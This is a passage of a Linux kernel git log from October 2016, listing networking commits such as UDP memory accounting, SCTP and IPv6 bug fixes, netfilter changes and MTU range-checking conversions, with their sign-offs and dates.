ip_cmsg_recv") : Tom missed that ipv4 udp messages could be received on
AF_INET6 socket. ip_cmsg_recv(msg, skb) should have been replaced by
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));

Then commit e6afc8ace6 ("udp: remove headers from UDP packets before
queueing") forgot to adjust the offsets now UDP headers are pulled
before skb are put in receive queue.

Fixes: ad6f939ab1 ("ip: Add offset parameter to ip_cmsg_recv")
Fixes: e6afc8ace6 ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Sam Kumar <samanthakumar@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Tested-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:33:22 -04:00
Xin Long
ecc515d723 sctp: fix the panic caused by route update
Commit 7303a14750 ("sctp: identify chunks that need to be fragmented
at IP level") made the chunk be fragmented at IP level in the next round
if it's size exceed PMTU.

But there still is another case, PMTU can be updated if transport's dst
expires and transport's pmtu_pending is set in sctp_packet_transmit. If
the new PMTU is less than the chunk, the same issue with that commit can
be triggered.

So we should drop this packet and let it retransmit in another round
where it would be fragmented at IP level.

This patch is to fix it by checking the chunk size after PMTU may be
updated and dropping this packet if it's size exceed PMTU.

Fixes: 90017accff ("sctp: Add GSO support")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@txudriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:32:19 -04:00
Elad Raz
6edf10173a devlink: Prevent port_type_set() callback when it's not needed
When a port_type_set() is been called and the new port type set is the same
as the old one, just return success.

Signed-off-by: Elad Raz <eladr@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:30:32 -04:00
Sven Eckelmann
701470baba batman-adv: Revert "use core MTU range checking in misc drivers"
The maximum MTU is defined via the slave devices of an batman-adv
interface. Thus it is not possible to calculate the max_mtu during the
creation of the batman-adv device when no slave devices are attached. Doing
so would for example break non-fragmentation setups which then
(incorrectly) allow an MTU of 1500 even when underlying device cannot
transport 1500 bytes + batman-adv headers.

Checking the dynamically calculated max_mtu via the minimum of the slave
devices MTU during .ndo_change_mtu is also used by the bridge interface.

Cc: Jarod Wilson <jarod@redhat.com>
Fixes: b3e3893e12 ("net: use core MTU range checking in misc drivers")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:19:07 -04:00
Eric Dumazet
73e42ff72a sch_htb: do not report fake rate estimators
When I prepared commit d250a5f90e ("pkt_sched: gen_estimator: Dont
report fake rate estimators"), htb still had an implicit rate estimator
for all its classes.

Then later, I made this rate estimator optional in commit 64153ce0a7
("net_sched: htb: do not setup default rate estimators"), but I forgot
to update htb use of gnet_stats_copy_rate_est()

After this patch, "tc -s qdisc ..." no longer report fake rate
estimators for HTB classes.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-26 17:13:49 -04:00
J. Bruce Fields
2876a34466 sunrpc: don't pass on-stack memory to sg_set_buf
As of ac4e97abce "scatterlist: sg_set_buf() argument must be in linear
mapping", sg_set_buf hits a BUG when make_checksum_v2->xdr_process_buf,
among other callers, passes it memory on the stack.

We only need a scatterlist to pass this to the crypto code, and it seems
like overkill to require kmalloc'd memory just to encrypt a few bytes,
but for now this seems the best fix.

Many of these callers are in the NFS write paths, so we allocate with
GFP_NOFS.  It might be possible to do without allocations here entirely,
but that would probably be a bigger project.

Cc: Rusty Russell <rusty@rustcorp.com.au>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-10-26 15:49:48 -04:00
Pablo Neira Ayuso
254432613c netfilter: nft_ct: add notrack support
This patch adds notrack support.

I decided to add a new expression, given that this doesn't fit into the
existing set operation. Notrack doesn't need a source register, and an
hypothetical NFT_CT_NOTRACK key makes no sense since matching the
untracked state is done through NFT_CT_STATE.

I'm placing this new notrack expression into nft_ct.c, I think a single
module is too much.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:16 +02:00
Liping Zhang
96d9f2a72c netfilter: nft_meta: permit pkttype mangling in ip/ip6 prerouting
After supporting this, we can combine it with hash expression to emulate
the 'cluster match'.

Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:16 +02:00
Liping Zhang
0ecba4d9d1 netfilter: nft_numgen: start round robin from zero
Currently we start round robin from 1, but it's better to start round
robin from 0. This is to keep consistent with xt_statistic in iptables.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:16 +02:00
Florian Westphal
5efa0fc6d7 netfilter: nf_tables: allow expressions to return STOLEN
Currently not supported, we'd oops as skb was (or is) free'd elsewhere.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:15 +02:00
Calvin Owens
0813fbc913 netfilter: nfnetlink_log: Use GFP_NOWARN for skb allocation
Since the code explicilty falls back to a smaller allocation when the
large one fails, we shouldn't complain when that happens.

Signed-off-by: Calvin Owens <calvinowens@fb.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:15 +02:00
Gao Feng
dd2602d00f netfilter: xt_multiport: Use switch case instead of multiple condition checks
There are multiple equality condition checks in the original codes, so it
is better to use switch case instead of them.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-26 16:35:15 +02:00
Johannes Berg
e1957dba5b cfg80211: process events caused by suspend before suspending
When suspending without WoWLAN, cfg80211 will ask drivers to
disconnect. Even when the driver does this synchronously, and
immediately returns with a notification, cfg80211 schedules
the handling thereof to a workqueue, and may then call back
into the driver when the driver was already suspended/ing.

Fix this by processing all events caused by cfg80211_leave_all()
directly after that function returns. The driver still needs to
do the right thing here and wait for the firmware response, but
that is - at least - true for mwifiex where this occurred.

Reported-by: Amitkumar Karwar <akarwar@marvell.com>
Tested-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-26 07:59:52 +02:00
Cyrill Gorcunov
432490f9d4 net: ip, diag -- Add diag interface for raw sockets
In criu we are actively using diag interface to collect sockets
present in the system when dumping applications. And while for
unix, tcp, udp[lite], packet, netlink it works as expected,
the raw sockets do not have. Thus add it.

v2:
 - add missing sock_put calls in raw_diag_dump_one (by eric.dumazet@)
 - implement @destroy for diag requests (by dsa@)

v3:
 - add export of raw_abort for IPv6 (by dsa@)
 - pass net-admin flag into inet_sk_diag_fill due to
   changes in net-next branch (by dsa@)

v4:
 - use @pad in struct inet_diag_req_v2 for raw socket
   protocol specification: raw module carries sockets
   which may have custom protocol passed from socket()
   syscall and sole @sdiag_protocol is not enough to
   match underlied ones
 - start reporting protocol specifed in socket() call
   when sockets are raw ones for the same reason: user
   space tools like ss may parse this attribute and use
   it for socket matching

v5 (by eric.dumazet@):
 - use sock_hold in raw_sock_get instead of atomic_inc,
   we're holding (raw_v4_hashinfo|raw_v6_hashinfo)->lock
   when looking up so counter won't be zero here.

v6:
 - use sdiag_raw_protocol() helper which will access @pad
   structure used for raw sockets protocol specification:
   we can't simply rename this member without breaking uapi

v7:
 - sine sdiag_raw_protocol() helper is not suitable for
   uapi lets rather make an alias structure with proper
   names. __check_inet_diag_req_raw helper will catch
   if any of structure unintentionally changed.

CC: David S. Miller <davem@davemloft.net>
CC: Eric Dumazet <eric.dumazet@gmail.com>
CC: David Ahern <dsa@cumulusnetworks.com>
CC: Alexey Kuznetsov <kuznet@ms2.inr.ac.ru>
CC: James Morris <jmorris@namei.org>
CC: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
CC: Patrick McHardy <kaber@trash.net>
CC: Andrey Vagin <avagin@openvz.org>
CC: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 19:35:24 -04:00
David S. Miller
44060abe1d Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth
Johan Hedberg says:

====================
pull request: bluetooth 2016-10-21

Here are some more Bluetooth fixes for the 4.9 kernel:

 - Fix to btwilink driver probe function return value
 - Power management fix to hci_bcm
 - Fix to encoding name in scan response data

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:51:38 -04:00
Thomas Graf
f76a9db351 lwt: Remove unused len field
The field is initialized by ILA and MPLS but never used. Remove it.

Signed-off-by: Thomas Graf <tgraf@suug.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:45:01 -04:00
Jiri Slaby
a4b8e71b05 net: sctp, forbid negative length
Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
        if (len < sizeof(int))
                return -EINVAL;

On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.

Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.

Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.

If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
 0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
 ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
 0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
 [<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
 [<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
 [<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
 [<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
 [<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
 [<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
 [<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
 [<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:43:15 -04:00
Jason A. Donenfeld
b678aa578c ipv6: do not increment mac header when it's unset
Otherwise we'll overflow the integer. This occurs when layer 3 tunneled
packets are handed off to the IPv6 layer.

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:38:58 -04:00
Andrey Vagin
7281a66590 net: allow to kill a task which waits net_mutex in copy_new_ns
net_mutex can be locked for a long time. It may be because many
namespaces are being destroyed or many processes decide to create
a network namespace.

Both these operations are heavy, so it is better to have an ability to
kill a process which is waiting net_mutex.

Cc: "David S. Miller" <davem@davemloft.net>
Cc: Eric W. Biederman <ebiederm@xmission.com>
Signed-off-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:33:39 -04:00
Shmulik Ladkani
d65f2fa680 net/sched: em_meta: Fix 'meta vlan' to correctly recognize zero VID frames
META_COLLECTOR int_vlan_tag() assumes that if the accel tag (vlan_tci)
is zero, then no vlan accel tag is present.

This is incorrect for zero VID vlan accel packets, making the following
match fail:
  tc filter add ... basic match 'meta(vlan mask 0xfff eq 0)' ...

Apparently 'int_vlan_tag' was implemented prior VLAN_TAG_PRESENT was
introduced in 05423b2 "vlan: allow null VLAN ID to be used"
(and at time introduced, the 'vlan_tx_tag_get' call in em_meta was not
 adapted).

Fix, testing skb_vlan_tag_present instead of testing skb_vlan_tag_get's
value.

Fixes: 05423b2413 ("vlan: allow null VLAN ID to be used")
Fixes: 1a31f2042e ("netsched: Allow meta match on vlan tag on receive")

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-23 17:31:25 -04:00
Daniel Borkmann
2d0e30c30f bpf: add helper for retrieving current numa node id
Use case is mainly for soreuseport to select sockets for the local
numa node, but since generic, lets also add this for other networking
and tracing program types.

Suggested-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:52 -04:00
Paolo Abeni
850cbaddb5 udp: use it's own memory accounting schema
Completely avoid default sock memory accounting and replace it
with udp-specific accounting.

Since the new memory accounting model encapsulates completely
the required locking, remove the socket lock on both enqueue and
dequeue, and avoid using the backlog on enqueue.

Be sure to clean-up rx queue memory on socket destruction, using
udp its own sk_destruct.

Tested using pktgen with random src port, 64 bytes packet,
wire-speed on a 10G link as sender and udp_sink as the receiver,
using an l4 tuple rxhash to stress the contention, and one or more
udp_sink instances with reuseport.

nr readers      Kpps (vanilla)  Kpps (patched)
1               170             440
3               1250            2150
6               3000            3650
9               4200            4450
12              5700            6250

v4 -> v5:
  - avoid unneeded test in first_packet_length

v3 -> v4:
  - remove useless sk_rcvqueues_full() call

v2 -> v3:
  - do not set the now unsed backlog_rcv callback

v1 -> v2:
  - add memory pressure support
  - fixed dropwatch accounting for ipv6

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:05 -04:00
Paolo Abeni
f970bd9e3a udp: implement memory accounting helpers
Avoid using the generic helpers.
Use the receive queue spin lock to protect the memory
accounting operation, both on enqueue and on dequeue.

On dequeue perform partial memory reclaiming, trying to
leave a quantum of forward allocated memory.

On enqueue use a custom helper, to allow some optimizations:
- use a plain spin_lock() variant instead of the slightly
  costly spin_lock_irqsave(),
- avoid dst_force check, since the calling code has already
  dropped the skb dst
- avoid orphaning the skb, since skb_steal_sock() already did
  the work for us

The above needs custom memory reclaiming on shutdown, provided
by the udp_destruct_sock().

v5 -> v6:
  - don't orphan the skb on enqueue

v4 -> v5:
  - replace the mem_lock with the receive queue spin lock
  - ensure that the bh is always allowed to enqueue at least
    a skb, even if sk_rcvbuf is exceeded

v3 -> v4:
  - reworked memory accunting, simplifying the schema
  - provide an helper for both memory scheduling and enqueuing

v1 -> v2:
  - use a udp specific destrctor to perform memory reclaiming
  - remove a couple of helpers, unneeded after the above cleanup
  - do not reclaim memory on dequeue if not under memory
    pressure
  - reworked the fwd accounting schema to avoid potential
    integer overflow

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:05 -04:00
Paolo Abeni
f8c3bf00d4 net/socket: factor out helpers for memory and queue manipulation
Basic sock operations that udp code can use with its own
memory accounting schema. No functional change is introduced
in the existing APIs.

v4 -> v5:
  - avoid whitespace changes

v2 -> v4:
  - avoid exporting __sock_enqueue_skb

v1 -> v2:
  - avoid export sock_rmem_free

Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 17:05:05 -04:00
WANG Cong
396a30cce1 ipv4: use the right lock for ping_group_range
This reverts commit a681574c99
("ipv4: disable BH in set_ping_group_range()") because we never
read ping_group_range in BH context (unlike local_port_range).

Then, since we already have a lock for ping_group_range, those
using ip_local_ports.lock for ping_group_range are clearly typos.

We might consider to share a same lock for both ping_group_range
and local_port_range w.r.t. space saving, but that should be for
net-next.

Fixes: a681574c99 ("ipv4: disable BH in set_ping_group_range()")
Fixes: ba6b918ab2 ("ping: move ping_group_range out of CONFIG_SYSCTL")
Cc: Eric Dumazet <edumazet@google.com>
Cc: Eric Salo <salo@google.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 16:23:12 -04:00
Paul Moore
2a73306b60 netns: revert "netns: avoid disabling irq for netns id"
This reverts commit bc51dddf98 ("netns: avoid disabling irq for
netns id") as it was found to cause problems with systems running
SELinux/audit, see the mailing list thread below:

 * http://marc.info/?t=147694653900002&r=1&w=2

Eventually we should be able to reintroduce this code once we have
rewritten the audit multicast code to queue messages much the same
way we do for unicast messages.  A tracking issue for this can be
found below:

 * https://github.com/linux-audit/audit-kernel/issues/23

Reported-by: Stephen Smalley <sds@tycho.nsa.gov>
Reported-by: Elad Raz <e@eladraz.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Paul Moore <paul@paul-moore.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-22 16:16:29 -04:00
Jarod Wilson
8b1efc0f83 net: remove MTU limits on a few ether_setup callers
These few drivers call ether_setup(), but have no ndo_change_mtu, and thus
were overlooked for changes to MTU range checking behavior. They
previously had no range checks, so for feature-parity, set their min_mtu
to 0 and max_mtu to ETH_MAX_MTU (65535), instead of the 68 and 1500
inherited from the ether_setup() changes. Fine-tuning can come after we get
back to full feature-parity here.

CC: netdev@vger.kernel.org
Reported-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
CC: Asbjoern Sloth Toennesen <asbjorn@asbjorn.st>
CC: R Parameswaran <parameswaran.r7@gmail.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-21 13:57:50 -04:00
WANG Cong
8651be8f14 ipv6: fix a potential deadlock in do_ipv6_setsockopt()
Baozeng reported this deadlock case:

       CPU0                    CPU1
       ----                    ----
  lock([  165.136033] sk_lock-AF_INET6);
                               lock([  165.136033] rtnl_mutex);
                               lock([  165.136033] sk_lock-AF_INET6);
  lock([  165.136033] rtnl_mutex);

Similar to commit 87e9f03159
("ipv4: fix a potential deadlock in mcast getsockopt() path")
this is due to we still have a case, ipv6_sock_mc_close(),
where we acquire sk_lock before rtnl_lock. Close this deadlock
with the similar solution, that is always acquire rtnl lock first.

Fixes: baf606d9c9 ("ipv4,ipv6: grab rtnl before locking the socket")
Reported-by: Baozeng Ding <sploving1@gmail.com>
Tested-by: Baozeng Ding <sploving1@gmail.com>
Cc: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Reviewed-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-21 11:29:02 -04:00
David S. Miller
8dbad1a811 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf
Pablo Neira Ayuso says:

====================
Netfilter fixes for net

The following patchset contains Netfilter fixes for your net tree,
they are:

1) Fix compilation warning in xt_hashlimit on m68k 32-bits, from
   Geert Uytterhoeven.

2) Fix wrong timeout in set elements added from packet path via
   nft_dynset, from Anders K. Pedersen.

3) Remove obsolete nf_conntrack_events_retry_timeout sysctl
   documentation, from Nicolas Dichtel.

4) Ensure proper initialization of log flags via xt_LOG, from
   Liping Zhang.

5) Missing alias to autoload ipcomp, also from Liping Zhang.

6) Missing NFTA_HASH_OFFSET attribute validation, again from Liping.

7) Wrong integer type in the new nft_parse_u32_check() function,
   from Dan Carpenter.

8) Another wrong integer type declaration in nft_exthdr_init, also
   from Dan Carpenter.

9) Fix insufficient mode validation in nft_range.

10) Fix compilation warning in nft_range due to possible uninitialized
    value, from Arnd Bergmann.

11) Zero nf_hook_ops allocated via xt_hook_alloc() in x_tables to
    calm down kmemcheck, from Florian Westphal.

12) Schedule gc_worker() to run again if GC_MAX_EVICTS quota is reached,
    from Nicolas Dichtel.

13) Fix nf_queue() after conversion to single-linked hook list, related
    to incorrect bypass flag handling and incorrect hook point of
    reinjection.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-21 10:25:22 -04:00
Linus Lüssing
9799c50372 batman-adv: fix splat on disabling an interface
As long as there is still a reference for a hard interface held, there might
still be a forwarding packet relying on its attributes.

Therefore avoid setting hard_iface->soft_iface to NULL when disabling a hard
interface.

This fixes the following, potential splat:

    batman_adv: bat0: Interface deactivated: eth1
    batman_adv: bat0: Removing interface: eth1
    cgroup: new mount options do not match the existing superblock, will be ignored
    batman_adv: bat0: Interface deactivated: eth3
    batman_adv: bat0: Removing interface: eth3
    ------------[ cut here ]------------
    WARNING: CPU: 3 PID: 1986 at ./net/batman-adv/bat_iv_ogm.c:549 batadv_iv_send_outstanding_bat_ogm_packet+0x145/0x643 [batman_adv]
    Modules linked in: batman_adv(O-) <...>
    CPU: 3 PID: 1986 Comm: kworker/u8:2 Tainted: G        W  O    4.6.0-rc6+ #1
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
    Workqueue: bat_events batadv_iv_send_outstanding_bat_ogm_packet [batman_adv]
     0000000000000000 ffff88001d93bca0 ffffffff8126c26b 0000000000000000
     0000000000000000 ffff88001d93bcf0 ffffffff81051615 ffff88001f19f818
     000002251d93bd68 0000000000000046 ffff88001dc04a00 ffff88001becbe48
    Call Trace:
     [<ffffffff8126c26b>] dump_stack+0x67/0x90
     [<ffffffff81051615>] __warn+0xc7/0xe5
     [<ffffffff8105164b>] warn_slowpath_null+0x18/0x1a
     [<ffffffffa0356f24>] batadv_iv_send_outstanding_bat_ogm_packet+0x145/0x643 [batman_adv]
     [<ffffffff8108b01f>] ? __lock_is_held+0x32/0x54
     [<ffffffff810689a2>] process_one_work+0x2a8/0x4f5
     [<ffffffff81068856>] ? process_one_work+0x15c/0x4f5
     [<ffffffff81068df2>] worker_thread+0x1d5/0x2c0
     [<ffffffff81068c1d>] ? process_scheduled_works+0x2e/0x2e
     [<ffffffff81068c1d>] ? process_scheduled_works+0x2e/0x2e
     [<ffffffff8106dd90>] kthread+0xc0/0xc8
     [<ffffffff8144de82>] ret_from_fork+0x22/0x40
     [<ffffffff8106dcd0>] ? __init_kthread_worker+0x55/0x55
    ---[ end trace 647f9f325123dc05 ]---

What happened here is, that there was still a forw_packet (here: a BATMAN IV
OGM) in the queue of eth3 with the forw_packet->if_incoming set to eth1 and the
forw_packet->if_outgoing set to eth3.

When eth3 is to be deactivated and removed, then this thread waits for the
forw_packet queued on eth3 to finish. Because eth1 was deactivated and removed
earlier and by that had forw_packet->if_incoming->soft_iface, set to NULL, the
splat when trying to send/flush the OGM on eth3 occures.

Fixes: c6c8fea297 ("net: Add batman-adv meshing protocol")
Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
[sven@narfation.org: Reduced size of Oops message]
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-21 14:47:02 +02:00
Jarod Wilson
b96f9afee4 ipv4/6: use core net MTU range checking
ipv4/ip_tunnel:
- min_mtu = 68, max_mtu = 0xFFF8 - dev->hard_header_len - t_hlen
- preserve all ndo_change_mtu checks for now to prevent regressions

ipv6/ip6_tunnel:
- min_mtu = 68, max_mtu = 0xFFF8 - dev->hard_header_len
- preserve all ndo_change_mtu checks for now to prevent regressions

ipv6/ip6_vti:
- min_mtu = 1280, max_mtu = 65535
- remove redundant vti6_change_mtu

ipv6/sit:
- min_mtu = 1280, max_mtu = 0xFFF8 - t_hlen
- remove redundant ipip6_tunnel_change_mtu

CC: netdev@vger.kernel.org
CC: "David S. Miller" <davem@davemloft.net>
CC: Alexey Kuznetsov <kuznet@ms2.inr.ac.ru>
CC: James Morris <jmorris@namei.org>
CC: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
CC: Patrick McHardy <kaber@trash.net>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:10 -04:00
Jarod Wilson
b3e3893e12 net: use core MTU range checking in misc drivers
firewire-net:
- set min/max_mtu
- remove fwnet_change_mtu

nes:
- set max_mtu
- clean up nes_netdev_change_mtu

xpnet:
- set min/max_mtu
- remove xpnet_dev_change_mtu

hippi:
- set min/max_mtu
- remove hippi_change_mtu

batman-adv:
- set max_mtu
- remove batadv_interface_change_mtu
- initialization is a little async, not 100% certain that max_mtu is set
  in the optimal place, don't have hardware to test with

rionet:
- set min/max_mtu
- remove rionet_change_mtu

slip:
- set min/max_mtu
- streamline sl_change_mtu

um/net_kern:
- remove pointless ndo_change_mtu

hsi/clients/ssi_protocol:
- use core MTU range checking
- remove now redundant ssip_pn_set_mtu

ipoib:
- set a default max MTU value
- Note: ipoib's actual max MTU can vary, depending on if the device is in
  connected mode or not, so we'll just set the max_mtu value to the max
  possible, and let the ndo_change_mtu function continue to validate any new
  MTU change requests with checks for CM or not. Note that ipoib has no
  min_mtu set, and thus, the network core's mtu > 0 check is the only lower
  bounds here.

mptlan:
- use net core MTU range checking
- remove now redundant mpt_lan_change_mtu

fddi:
- min_mtu = 21, max_mtu = 4470
- remove now redundant fddi_change_mtu (including export)

fjes:
- min_mtu = 8192, max_mtu = 65536
- The max_mtu value is actually one over IP_MAX_MTU here, but the idea is to
  get past the core net MTU range checks so fjes_change_mtu can validate a
  new MTU against what it supports (see fjes_support_mtu in fjes_hw.c)

hsr:
- min_mtu = 0 (calls ether_setup, max_mtu is 1500)

f_phonet:
- min_mtu = 6, max_mtu = 65541

u_ether:
- min_mtu = 14, max_mtu = 15412

phonet/pep-gprs:
- min_mtu = 576, max_mtu = 65530
- remove redundant gprs_set_mtu

CC: netdev@vger.kernel.org
CC: linux-rdma@vger.kernel.org
CC: Stefan Richter <stefanr@s5r6.in-berlin.de>
CC: Faisal Latif <faisal.latif@intel.com>
CC: linux-rdma@vger.kernel.org
CC: Cliff Whickman <cpw@sgi.com>
CC: Robin Holt <robinmholt@gmail.com>
CC: Jes Sorensen <jes@trained-monkey.org>
CC: Marek Lindner <mareklindner@neomailbox.ch>
CC: Simon Wunderlich <sw@simonwunderlich.de>
CC: Antonio Quartulli <a@unstable.cc>
CC: Sathya Prakash <sathya.prakash@broadcom.com>
CC: Chaitra P B <chaitra.basappa@broadcom.com>
CC: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
CC: MPT-FusionLinux.pdl@broadcom.com
CC: Sebastian Reichel <sre@kernel.org>
CC: Felipe Balbi <balbi@kernel.org>
CC: Arvid Brodin <arvid.brodin@alten.se>
CC: Remi Denis-Courmont <courmisch@gmail.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:10 -04:00
Jarod Wilson
91572088e3 net: use core MTU range checking in core net infra
geneve:
- Merge __geneve_change_mtu back into geneve_change_mtu, set max_mtu
- This one isn't quite as straight-forward as others, could use some
  closer inspection and testing

macvlan:
- set min/max_mtu

tun:
- set min/max_mtu, remove tun_net_change_mtu

vxlan:
- Merge __vxlan_change_mtu back into vxlan_change_mtu
- Set max_mtu to IP_MAX_MTU and retain dynamic MTU range checks in
  change_mtu function
- This one is also not as straight-forward and could use closer inspection
  and testing from vxlan folks

bridge:
- set max_mtu of IP_MAX_MTU and retain dynamic MTU range checks in
  change_mtu function

openvswitch:
- set min/max_mtu, remove internal_dev_change_mtu
- note: max_mtu wasn't checked previously, it's been set to 65535, which
  is the largest possible size supported

sch_teql:
- set min/max_mtu (note: max_mtu previously unchecked, used max of 65535)

macsec:
- min_mtu = 0, max_mtu = 65535

macvlan:
- min_mtu = 0, max_mtu = 65535

ntb_netdev:
- min_mtu = 0, max_mtu = 65535

veth:
- min_mtu = 68, max_mtu = 65535

8021q:
- min_mtu = 0, max_mtu = 65535

CC: netdev@vger.kernel.org
CC: Nicolas Dichtel <nicolas.dichtel@6wind.com>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Tom Herbert <tom@herbertland.com>
CC: Daniel Borkmann <daniel@iogearbox.net>
CC: Alexander Duyck <alexander.h.duyck@intel.com>
CC: Paolo Abeni <pabeni@redhat.com>
CC: Jiri Benc <jbenc@redhat.com>
CC: WANG Cong <xiyou.wangcong@gmail.com>
CC: Roopa Prabhu <roopa@cumulusnetworks.com>
CC: Pravin B Shelar <pshelar@ovn.org>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Patrick McHardy <kaber@trash.net>
CC: Stephen Hemminger <stephen@networkplumber.org>
CC: Pravin Shelar <pshelar@nicira.com>
